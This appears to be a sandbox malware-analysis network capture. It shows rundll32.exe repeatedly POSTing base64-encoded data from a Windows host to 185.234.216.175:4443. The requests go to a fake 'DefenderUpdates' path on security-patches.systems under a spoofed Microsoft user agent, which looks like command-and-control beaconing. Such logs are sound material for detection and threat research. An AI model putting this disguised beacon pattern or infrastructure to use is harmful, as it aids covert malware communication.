Dec 6, 2024 22:13:30.791584969 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:30 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	50003	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:31.051995039 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:32.506458044 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:32 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	50009	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:32.771295071 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:34.226027966 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:33 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	50015	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:34.487793922 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:35.933967113 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:35 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	50020	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:36.191747904 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:37.665539026 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:37 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	50024	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:37.999165058 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:39.454797029 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:39 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	50028	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:39.722585917 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:41.192188025 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:40 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	50034	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:41.456517935 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:43.008671999 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:42 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	50040	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:43.372714996 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:44.837747097 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:44 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	50045	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:45.099308014 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:46.603102922 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:46 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	50048	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:46.867543936 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:48.334436893 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:47 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	50053	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:48.621855021 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:50.159665108 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:49 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	50059	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:50.426202059 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: 